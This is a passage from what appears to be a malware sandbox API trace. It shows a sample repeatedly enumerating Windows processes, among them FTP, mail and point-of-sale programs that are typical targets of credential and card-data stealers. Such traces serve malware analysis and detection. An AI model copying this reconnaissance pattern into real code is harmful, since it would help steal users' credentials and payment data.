th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.761] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0213.764] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0213.766] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0213.768] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.771] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0213.814] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0213.817] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0213.819] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0213.821] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0213.824] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0213.826] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0213.829] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0213.831] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0213.834] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0213.838] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0213.840] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0213.842] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0213.843] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0213.846] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0213.848] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0213.902] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0213.905] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0213.907] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0213.908] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0213.910] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0213.912] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0213.914] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0213.917] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0213.919] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0213.923] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0213.925] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0213.927] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0213.929] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0213.931] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0213.933] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0213.935] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0213.937] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0213.978] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0213.980] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0213.982] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0213.989] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0213.991] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0213.994] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0213.996] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0213.998] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0214.000] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0214.002] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0214.005] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0214.007] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0214.009] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0214.011] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0214.013] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0214.015] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0214.020] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0214.023] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0214.025] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0214.027] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0214.029] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0214.031] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0214.033] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0214.034] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0214.036] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0214.046] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0214.048] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0214.050] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0214.051] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0214.053] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0214.055] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0214.057] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0214.059] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0214.061] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0214.062] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0214.070] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0214.073] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0214.075] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0214.077] CloseHandle (hObject=0x2164) returned 1 [0214.077] Sleep (dwMilliseconds=0x64) [0214.199] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0214.220] Process32First (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.223] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0214.225] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0214.226] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.228] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0214.229] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.231] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0214.233] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0214.235] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, 